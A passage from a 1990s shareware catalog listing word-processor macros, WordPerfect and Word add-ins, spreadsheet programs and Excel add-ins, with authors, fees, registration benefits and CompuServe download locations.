program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + fax, CompuServe, newsletter, mail support; all ASP-wide offers + (see page 6); disks of other shareware; discounts on other + products; discounts on upgrades. + Look for: MARGAR??.ZIP on BBSs; MARGAR??.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 1 (or contact userID 72330,1776 for + assistance). + SWREG#: 3454 + Download size: 40k (about three minutes with a 2400 baud modem) + Description: + A useful utility for formatting text files, especially + shareware documentation files. Will quickly go through a text + file and report the space available for creating a left margin + while maintaining the document's original formatting. Supports + page widths of 25-132 columns. Also will add top and bottom + margins as well as page numbers if requested. Menu-driven + interface; three options for handling embedded form-feed + characters; option to convert extended characters to Epson- + compatible low-ASCII. + + Chapter 3, "Writing applications" 202 + + + + Product: MEGA EDIT Editor for Windows + Text editor for large files. See full description on page 178. + + Product: TIFFmaker + Converts text to TIFF files. See full description on page 509. + + + 3.13 Software tools & macros + + 3.13.1 For multiple programs + + Product: CommEx + Common dialog extensions for Windows 3.1/3.11. See full + description on page 168. + + Product: File-Ex + Adds file management functions to file dlgs. See full + description on page 169. + + Product: Fonts Ink Fonts + Specialized TrueType and PostScript fonts. See full + description on page 75. + + Product: Over_LAZ HP + Author: Herne Data Systems Ltd, 519-366-2732 + Version: 4 (01-01-94) + Needs: IBM PC, DOS 2.0 or better. CGA monitor; Hard disk; HP + LaserJet printer. WordPerfect 5.x, 6, WordStar, Word, AMI Pro + or PC-Write. HP LaserJet II/III/4 printer. + Strongly recommended: Word processing program, spread sheet, + data base. + Registration fee: $25.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of phone, + CompuServe, mail support; bonus templates. 3-month free + upgrading allowed. + Look for: availability unknown on BBSs; OVER4.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 2 (or contact userID 72060,1153 for + assistance). + Download size: 1400k (about 104 minutes with a 2400 baud modem) + Description: + A collection of over 150 printer overlay files for WordPerfect + 4.2 or later, Word, Word for Windows, AmiPro WordStar, PC- + Write, dBase, and other applications and an HP LaserJet + compatible printer. Over_LAZ are provided for standard office + forms (inter office memo, FAX transmittal, etc) as well as + 'rubber stamps' (draft, confidential, etc) and decorative page + borders. Over_LAZ are automatically printed on the page over + your document. Extra fonts are not required. 512k printer RAM + is sufficient. + + Chapter 3, "Writing applications" 203 + + + + Product: Safe Program + Lock files in a software safe - Email secure. See full + description on page 34. + + Product: Zip Express + Zip Code look up and auto-paster. See full description on + page 318. + + 3.13.2 For PC-Write + + Product: Over_LAZ HP + HP LaserJet overlays and letterheads. See full description on + page 202. + + Product: PC-Proof + A commercial quality grammar checker. See full description on + page 193. + + Product: WinProof + Windows grammar checker. See full description on page 193. + + 3.13.3 For Word + + Product: Over_LAZ HP + HP LaserJet overlays and letterheads. See full description on + page 202. + + Product: PC-Proof + A commercial quality grammar checker. See full description on + page 193. + + 3.13.3.1 Word for Windows + + Product: 3.5" Disk Label Creator for Wor + Author: AMF (Andrew M. Freeman) + Version: 2.0 (06-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $10.00 + Registration benefits: quick-reference card; 6 months of + unlimited CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 6). + Look for: 35LABEL.ZIP on BBSs; 35LABEL.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 74250,1700 for + assistance). + SWREG#: 2172 + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + 3.5" Disk Label Creator for Word makes making Disk Labels a + snap on any stock! Easy to use with professional results. + by AMF + + Chapter 3, "Writing applications" 204 + + + + Product: Business Cards for Word + Author: AMF (Andrew M. Freeman) + Version: 2.0 (06-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows. + Registration fee: $10.00 + Registration benefits: Full program functionality; printed + manual; 6 months of unlimited mail support; source code; bonus + data; all ASP-wide offers (see page 6). + Look for: AFCRD.ZIP on BBSs; AFCRD.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 74250,1700 for + assistance). + SWREG#: 2260 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Quickly and effortlessly, one can create quality, professional- + looking, custom business cards with Word for Windows. + + + Product: CD Player for Word + Author: AMF (Andrew M. Freeman) + Version: 95 (06-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. CD-ROM drive. + Word for Windows, CD-Audio Driver for Windows. + Registration fee: $15.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: CD.ZIP on BBSs; CD.ZIP on CompuServe in CIS:MSWORD + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 2857 + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + The only full-featured CD player for Word. All basic CD + functions including scan backward/forward, stop, pause, random + play, live time display. Plus title database and more. All from + inside Word. Includes a beautiful, full-color toolbar and a + setup program. + + Chapter 3, "Writing applications" 205 + + + + Product: Colored Toolbar Icons for Word + Author: AMF (Andrew M. Freeman) + Version: 7.0 (06-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows. + Registration fee: $10.00 + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 6 months of + unlimited CompuServe, mail support; bonus graphics; all ASP- + wide offers (see page 6). + Look for: AFCOLICO.ZIP on BBSs; AFCOLI.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 74250,1700 for + assistance). + SWREG#: 2303 + Download size: 35k (about three minutes with a 2400 baud modem) + Description: + This is a sample of the entire collection of colored toolbar + icons that come with the registered version. Colored toolbar + icons for every possible task you can imagine. Jazz up the Word + Workplace. Liven up presentations in Word. + + + Product: FaxMail for Windows + Full featured fax program for Windows 3,95,NT. See full + description on page 373. + + Product: File Manager Jr. + File manager for WinWord 6.0. See full description on + page 153. + + Product: MegaWord + Author: Merlot International (Romke Soldaat), (+1)-314-965-5630 + Version: 6.01 (04-26-94) + Needs: IBM PC, Windows 3.0 or better. + Strongly recommended: Mouse. + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 3-month return policy; source code; + all ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. 3-month free upgrading allowed. + Look for: MEGAWORD.ZIP on BBSs; MW601.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 100273,32 for + assistance). + SWREG#: 1130 + PsL#: 10970 + Download size: 440k (about 33 minutes with a 2400 baud modem) + Description: + An add-in template for Word for Windows v6.0. Offers more than + 30 applications for complete file, project and directory + management, printing, editing, formatting, viewing, instant + spell-checking, plus tools that insert calendars, numbers and + dates in any format and in more than 20 languages. + + Chapter 3, "Writing applications" 206 + + + + Product: P.I.M. for Word for Windows + Author: AMF (Andrew M. Freeman) + Version: 95 (06-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows. + Registration fee: $15.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6); discounts on upgrades. 1-month free upgrading allowed. + Look for: PIM.ZIP on BBSs; PIM.ZIP on CompuServe in CIS:MSWORD + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 2480 + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + The only full featured PIM for Word for Windows. Store more + than 21,000 entries. Works and looks like a real rolodex. + Autodial, fax, create envelopes and labels, create full-color + reports, create lusiness letters and more with just one click. + Easy to use push-button interface. Supports background + WinFaxing, voice mail telephones, & all modems. Full + documentation included along with an installation utility. + Imports every database and spreadsheet. Has an alarm and more. + Now with Fax Merge! + + + Product: Toolbar 2X for Word 6 + Author: AMF (Andrew M. Freeman) + Version: 2.0 (06-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows. + Registration fee: $15.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: TB2X.ZIP on BBSs; TB2X.ZIP on CompuServe in CIS:MSWORD + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 2677 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Eliminate the clutter form the Word Desktop with Toolbar 2x. + Allows two toolbars to occupy the space of one. Now fully + customizable. Easy to use and setup. Leaves more room for text + rather than toolbars. A real productivity tool. + + Chapter 3, "Writing applications" 207 + + + + Product: WINFAX PRO and Word Fax Macro + Author: AMF (Andrew M. Freeman) + Version: 7.0 (06-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows. + Registration fee: $10.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: WFXPRO.ZIP on BBSs; WFXPRO.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 74250,1700 for + assistance). + SWREG#: 2618 + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + The only fax macro in the business which takes advantage of + virtually every feature of WinFax Pro from inside Word. Choose + cover pages, resolution, type on cover page, specify recipient, + do background faxing, and so much more. + + + Product: WordLink(TM) + Author: Redei Enterprises, 310-832-6984 + Version: 1.0 (09-25-95) + Needs: IBM PC, Windows 3.0 or better. 8000k RAM; VGA monitor; + Hard disk; VBRUN300.DLL. + Strongly recommended: SVGA monitor; XMS memory; math + coprocessor. + Registration fee: $49.50 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6); discounts on other products. + Lifetime free upgrading allowed. Help in writing queries for + applications. + Look for: availability unknown on BBSs; W_LINK.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 2 (or contact userID 71744,3633 + for assistance). + SWREG#: 7722 + PsL#: 14239 + Download size: 2600k (about 193 minutes with a 2400 baud modem) + Description: + You can drag 'n' drop data from Access, dBase, FoxPro, Btrieve, + Paradox databases to a MSWord document with WordLink. You can + drop values of single fields of a record at bookmarks, or + multiple fields of multiple records into tables. WordLink is + also a database browser with full edit, query, sorting + capabilities. Calculated columns. Column totals. Parameter + queries. It records datasources and relationships in macros. + Macro play back allows full automation. Sample application + prints invoices. + + Chapter 3, "Writing applications" 208 + + + + Product: Wordware for Word for Windows + Author: AMF (Andrew M. Freeman) + Version: 96 (06-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows. + Registration fee: $39.95 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: WW96.ZIP on BBSs; WW96.ZIP on CompuServe in CIS:MSWORD + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 3297 + PsL#: 11521 + Download size: 420k (about 31 minutes with a 2400 baud modem) + Description: + Wordware has the hottest 60+ tools which will increase your + productivity 100% or more. Includes a full-fledged PIM, full- + faetured CD-player, and everything from copying files, to + renaming files, to playing tic tac toe. Even has a project + manager. Also Includes a 3.5" disk labeler, a faxer macro and + template which access every feature of WinFax Pro 7.0. Easy to + use and operate. Wordware is a complete people, file, & project + management solution package, & much more! + + + 3.13.4 For WordStar + + Product: Over_LAZ HP + HP LaserJet overlays and letterheads. See full description on + page 202. + + Chapter 3, "Writing applications" 209 + + + + 3.13.5 For WordPerfect + + Product: Bookbild/DOS Pamphlet Publisher [***] + Author: Science Translations Software Services (Jerry Stern), + 410-661-2224 + Version: 1.1 (02-01-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor; + Hercules monitor; Hard disk; HP DeskJet printer; HP LaserJet + printer; Postscript printer; Plotter; Epson printer. + WordPerfect 5.1 or 5.1+/DOS. + Strongly recommended: EMS memory; XMS memory. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of unlimited + phone, fax, BBS, CompuServe, GEnie, newsletter, mail support; + 3-month return policy; bonus utilities; bonus graphics; all + ASP-wide offers (see page 6); discounts on other products. + Look for: availability unknown on BBSs; BKBILD.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 12 (or contact userID 72144,1241 for + assistance); BKBILD11.ZIP on GEnie in WP forum LIBrary 6 (or + contact userID JERRY.STERN for assistance). + Download size: 137k (about ten minutes with a 2400 baud modem) + Description: + A macro package for WordPerfect 5.1 & 5.1+. The macro builds + pamphlets from formatted text files. The new document is + camera-ready, with each page in the correct sequence for + printing. Any two-across format can be used, in either + portrait or landscape mode. (Requires landscape fonts in + printer or add-on font package for landscape booklets.) Both + horizontally and vertically-folded booklets can be created. + + Chapter 3, "Writing applications" 210 + + + + Product: Bookbild/Win Pamphlet Publisher [***] + Author: Science Translations Software Services (Jerry Stern), + 410-661-2224 + Version: 1.1 (02-01-95) + Needs: IBM 80386, Windows 3.0 or better. 4000k RAM; CGA monitor; + Hercules monitor; Hard disk; HP DeskJet printer; HP LaserJet + printer; Postscript printer; Epson printer. WordPerfect 5.2 or + 5.2+/Windows. + Strongly recommended: EMS memory; XMS memory. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of unlimited + phone, fax, BBS, CompuServe, GEnie, newsletter, mail support; + 3-month limited return policy; bonus graphics; all ASP-wide + offers (see page 6); discounts on other products. + Look for: availability unknown on BBSs; BOOKWN.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 10 (or contact userID 72144,1241 for + assistance); BOOKWN11.ZIP on GEnie in WP forum LIBrary 8 (or + contact userID JERRY.STERN for assistance). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Builds pamphlets for formatted documents in WordPerfect 5.2 and + 5.2+. Any two-across format can be used, in either portrait or + landscape mode. Pages are rearranged into the order needed to + create camera-ready copy for bulk printing. Full instructions + make booklet preparation easy. + + + Product: dPerfect Merge + Converts xBase to WordPerfect secondary file. See full + description on page 45. + + Product: Graphcat/DOS Clip Art Cataloger [***] + Author: Science Translations Software Services (Jerry Stern), + 410-661-2224 + Version: 3.2 (11-01-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor; + Hercules monitor; Hard disk; HP DeskJet printer; HP LaserJet + printer; Postscript printer; Epson printer. WordPerfect 6.1, + 6.0 or 5.1 DOS editions, 6/90 release or newer. + Strongly recommended: EMS memory; XMS memory. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of phone, fax, BBS, CompuServe, GEnie, + newsletter, mail support; 3-month return policy; bonus + + Chapter 3, "Writing applications" 211 + + + + graphics; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. + Look for: availability unknown on BBSs; GCATWP.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 10 (or contact userID 72144,1241 for + assistance); GCATWP32.ZIP on GEnie in WP forum LIBrary 6 (or + contact userID JERRY.STERN for assistance). + Download size: 111k (about eight minutes with a 2400 baud modem) + Description: + DOS macro package that creates clip art catalogs in WordPerfect + 6.1, 6.0, 5.1+, and 5.1. Prepares a catalog for printing with + all the graphics it can find in the directory or on the disk + chosen. Any graphic format supported by WordPerfect is also + supported by Graphcat. Now includes: Horizontal catalogs, CD- + ROM support, directory searching, partial catalogs, and caption + autosizing. Additional layout features are included in the + registered edition, which also includes over a megabyte of clip + art. + + + Product: Graphcat/Win Clip Art Cataloger [***] + Author: Science Translations Software Services (Jerry Stern), + 410-661-2224 + Version: 4.0 (06-15-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; EGA monitor; + Hard disk; Mouse; EMS memory; XMS memory. WordPerfect/Windows + version 6.1, 6.0 & 5.2, 5.2+. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of unlimited + phone, fax, BBS, CompuServe, GEnie, newsletter, mail support; + 3-month limited return policy; bonus graphics; all ASP-wide + offers (see page 6); disks of other shareware; discounts on + other products; discounts on upgrades. + Look for: availability unknown on BBSs; GCATWN.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 10 (or contact userID 72144,1241 for + assistance); GCATWN40.ZIP on GEnie in WP forum LIBrary 8 (or + contact userID JERRY.STERN for assistance). + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + A macro package for WordPerfect 7, 6.1, 6.0, 6.0a, 5.2 & 5.2+ / + Windows that creates pictorial catalogs of clip art. All + graphics formats readable by WP/Win can be read by Graphcat, + and set up in columns as a pictorial catalog. Also can create + mergable listings of file names, and includes a database + template to aid in creating a full database of clip art files. + Supports directory searches, CD-ROM support, partial catalog + building, caption autosizing. + + Chapter 3, "Writing applications" 212 + + + + Product: The Letterhead Kit-32/Win [***] + Author: Science Translations Software Services (Jerry Stern), + 410-661-2224 + Version: 7.0 (06-15-96) + Needs: IBM 80386, Windows 95 or better. 4000k RAM; VGA monitor; + Hard disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Epson printer; EMS memory; XMS memory. WordPerfect + 6.1 or 6.0, 6.0a/Windows. + Strongly recommended: Mouse. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); 12 months of phone, fax, + BBS, CompuServe, GEnie, newsletter, mail support; 3-month + return policy; bonus utilities; bonus data; bonus templates; + all ASP-wide offers (see page 6); disks of other shareware; + discounts on other products; discounts on upgrades. + Look for: availability unknown on BBSs; LKIT32.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 2 (or contact userID 72144,1241 for + assistance); LKIT3270.ZIP on GEnie in WP forum LIBrary 8 (or + contact userID JERRY.STERN for assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + Business Correspondence Assistant for Corel WordPerfect Suite 7 + & Windows 95. A set of macros, forms, graphics and sample files + that retrieve letterheads, fax cover sheets, invoices, scanned + signature, and 30 message graphics, including "Rush!" and + "Thank you for your payment!" Forms and letterheads are + customized on-the-fly with user's name and address information. + + + Product: The Letterhead Kit/DOS [***] + Author: Science Translations Software Services (Jerry Stern), + 410-661-2224 + Version: 3.1 (05-01-96) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor; + Hercules monitor; Hard disk; HP DeskJet printer; HP LaserJet + printer; Postscript printer; Epson printer. WordPerfect 6.1, + 6.0, or 5.1 DOS editions. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: quick-reference card; 31/2" master disk(s); + 12 months of unlimited phone, fax, BBS, CompuServe, GEnie, + newsletter, mail support; 3-month limited return policy; bonus + + Chapter 3, "Writing applications" 213 + + + + utilities; bonus templates; all ASP-wide offers (see page 6); + discounts on other products. + Look for: availability unknown on BBSs; LTRKIT.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 2 (or contact userID 72144,1241 for + assistance); LTRKIT31.ZIP on GEnie in WP forum LIBrary 6 (or + contact userID JERRY.STERN for assistance). + Download size: 280k (about 21 minutes with a 2400 baud modem) + Description: + Letterhead Kit 3.1/DOS, by Jerry Stern. Business + Correspondence Assistant for WordPerfect 6.1, 6.0 & 5.1/DOS + that retrieves letterheads, scanned signatures, custom forms, & + any of 30 message graphics, including "Rush" and "Thank you for + your payment." New in version 3.1: Automatically customizes + forms in WP6, adds ZIP bar codes, fills label pages. Shareware + $20. A SciTrans Product. BBS name: LTRKIT31.ZIP + + + Product: The Letterhead Kit/Win [***] + Author: Science Translations Software Services (Jerry Stern), + 410-661-2224 + Version: 3.1 (07-15-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Epson printer; EMS memory; XMS memory. WordPerfect + 6.1 or 6.0, 6.0a/Windows. + Strongly recommended: Mouse. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); 12 months of phone, fax, + BBS, CompuServe, GEnie, newsletter, mail support; 3-month + return policy; bonus utilities; bonus data; bonus templates; + all ASP-wide offers (see page 6); disks of other shareware; + discounts on other products; discounts on upgrades. + Look for: availability unknown on BBSs; LKITWN.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 2 (or contact userID 72144,1241 for + assistance); LKITWN31.ZIP on GEnie in WP forum LIBrary 8 (or + contact userID JERRY.STERN for assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + Business Correspondence Assistant for WordPerfect 6.1 & 6.0, + 6.0a/Windows. A set of macros, forms, graphics and sample files + that retrieve letterheads, fax cover sheets, invoices, scanned + signature, and 30 message graphics, including "Rush!" and + "Thank you for your payment!" Forms and letterheads are + customized on-the-fly with user's name and address information. + + + Product: Over_LAZ HP + HP LaserJet overlays and letterheads. See full description on + page 202. + + Chapter 3, "Writing applications" 214 + + + + Product: PC-Proof + A commercial quality grammar checker. See full description on + page 193. + + Product: Public Address + Full featured address manager. See full description on + page 228. + + Product: WinProof + Windows grammar checker. See full description on page 193. + + 3.13.6 For other + + Product: Examine + Fast text search utility for Windows. See full description on + page 14. + + Product: Over_LAZ PS + PostScript overlays and letterheads. See full description on + page 88. + + Product: PSEARCH + Fast tool to search for files with text words. See full + description on page 16. + + Chapter 4, "Spreadsheet applications" 215 + + + + + + Chapter 4 + Spreadsheet applications + + See also: Utilities, Desktop utilities, Calculators; Finances, + Financial calculators; Business. + + + 4.1 Spreadsheet programs + + Product: ALITE + Author: TRIUS, Inc. (David Schulz/Paris Karahalios), + 508-794-9377 + Version: 1.20r (07-08-93) + Needs: IBM PC, DOS 2.11 or better. 7k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Dual 720k floppy drives; + Epson printer. + Strongly recommended: EGA monitor; Hard disk; EMS memory; XMS + memory. + Registration fee: $20.00 (add $6.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $12.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, BBS, CompuServe, newsletter, mail support; 1-month limited + return policy; discounts on other products. + Look for: ALITE.ZIP on BBSs (call 617-354-2505 to download it at + no charge); ALITE.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 6 (or contact userID 71333,103 for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Powerful spreadsheet that will run even on a system with only + 256k RAM! It will even run as TSR using 7k RAM; 2048 rows by + 128 columns; line, X-Y, bar, pie and stacked bar graphs; macro + command language, math, statistical, financial, date and string + functions; WKS and WK1 file compatible; data regression, data + question and data bin operations; file import, export and + merge, PIC file generation, and file linking; split windows, + block protection, matrix operations, and much more... + + Chapter 4, "Spreadsheet applications" 216 + + + + Product: AS-EASY-AS + Author: TRIUS, Inc. (David Schulz/Paris Karahalios), + 508-794-9377 + Version: 5.50e (10-29-93) + Needs: IBM PC, DOS 3.2 or better. 382k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Dual 720k floppy drives; + HP LaserJet printer; Epson printer. + Strongly recommended: EGA monitor; Hard disk; Mouse; EMS + memory; math coprocessor. + Registration fee: $69.00 (add $6.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $12.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, BBS, CompuServe, newsletter, mail support; 1-month limited + return policy; discounts on upgrades. + Look for: ASA550E.ZIP on BBSs (call 617-354-2505 to download it + at no charge); ASEASY.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 6 (or contact userID 71333,103 for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Awards & nominations: 1992 winner, Shareware Industry Awards. + Description: + Powerful 8192 rows by 256 columns spreadsheet. EMS and virtual + memory support. Fully mouseable. Print preview mode with + headers, footers, etc. Math, statistical, financial, logical, + date/time, string and user defined functions. Text & graphics + on same page. 12 graph types, (log scales, split graphs). + 9-pin, 24-pin and LaserJet support. WKS and WK1 file + compatible. Powerful macro language. Goalseeking, dBASE file + export/import, file merge & file linking. Matrix operations, + and much more... + + Chapter 4, "Spreadsheet applications" 217 + + + + Product: EXPRESSCALC + Author: Expressware Corporation, 206-788-0932 + Version: 4.10 (05-02-92) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $59.95 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $23.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 2-month return policy; discounts on + upgrades. 1-month free upgrading allowed. + Look for: ECALC*.ZIP on BBSs (multiple files) (call 206-788-4008 + to download it at no charge); ECALC4.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 6 (multiple files) (or contact userID + 75226,2020 for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Matrix size defaults to 64 columns by 256 lines for a total of + 16,384 cells. Supports EGA and VGA monitors for more lines on + the screen. Math functions include standard deviation, net + present value, payment and more. Lookup function allows + linking to other spreadsheets. Cells can be hidden. Data can + be imported and exported between File Express and ExpressGraph. + Wide spreadsheets can be printed using On-Side. + + + Product: Total Investor for 1-2-3 Window + Portfolio management and charting for 1-2-3. See full + description on page 218. + + + 4.2 Boilerplates/templates + + Product: INSTSPEC + Templates for instr data sheets (controls). See full + description on page 352. + + Chapter 4, "Spreadsheet applications" 218 + + + + Product: Total Investor for 1-2-3 Window + Author: Hughes Financial Services, 201-895-5665 + Version: 3.0 (08-17-95) + Needs: IBM 80386, DOS 3.0 or better. 4000k RAM. + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of unlimited fax, BBS, + CompuServe, newsletter, mail support; bonus data; all ASP-wide + offers (see page 6). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; TI123.EXE on CompuServe + in CIS:LOTUSA forum LIBrary 0 (or contact userID 76057,2400 for + assistance). + SWREG#: 7060 + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + An integrated portfolio management and technical analysis + package for use with Lotus 1-2-3 for Windows (v4 or better). It + tracks securities and transactions, calculates returns, charts + stocks, and helps make trading decisions based on a wide array + of technical indicators. Includes built in updating from + America Online, Prodigy, and Compuserve. Indicators include + HLCV charts, relative strength, moving averages, RSI and many + others. + + + 4.3 Spreadsheet utilities + + See also: Utilities, Printer utilities. + + Product: ON-SIDE + Print any wide ASCII file sideways. See full description on + page 77. + + 4.3.1 File format translators + + See also: Utilities, File utilities, File sorting & conversion. + + Product: Extract It + Report data extractor. See full description on page 45. + + + 4.4 Software tools & add-ins + + 4.4.1 For multiple programs + + Product: Bubble Chart + Bubble Chart, animated graph. See full description on + page 274. + + Chapter 4, "Spreadsheet applications" 219 + + + + 4.4.2 For Lotus + + Product: Total Investor for 1-2-3 DOS + Portfolio manager/technical analysis template. See full + description on page 324. + + Product: Total Investor for Symphony + Portfolio manager/technical analysis template. See full + description on page 325. + + 4.4.3 For Excel + + Product: DDE Requester for Win3.x & NT + DDE history recorder to access1.1 MDB or text. See full + description on page 342. + + Product: Units & Volumes + Author: X Libris (Kenneth L. Holladay) + Version: 1.1 (08-01-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM. MS Excel + 5.0. + Registration fee: $25.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 6 months of unlimited CompuServe, + mail support; bonus utilities; all ASP-wide offers (see + page 6); discounts on upgrades. 3-month free upgrading allowed. + Look for: availability unknown on BBSs; UNITVOL.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 13 (or contact userID 74130,1531 for + assistance). + SWREG#: 8185 + PsL#: 14298 + Download size: 203k (about 15 minutes with a 2400 baud modem) + Description: + An add-in for Microsoft Excel. It contains extensive unit + conversion and tank volume calculation functions. 17 unit + functions cover everything from Acceleration to Volumetric + Flow. 6 tank geometry functions range from spherical to + horizontal cylinder with end caps. Full Function wizard support + and extensive on-line help. + + Chapter 5, "Database applications" 220 + + + + + + Chapter 5 + Database applications + + See also: Data; Computer programming, Database engines. + + + 5.1 Relational database managers + + Product: THE CALLING TREE + Calling tree database manager. See full description on + page 299. + + Product: Car Restoration Diary + Author: RMH Computer Services (Richard 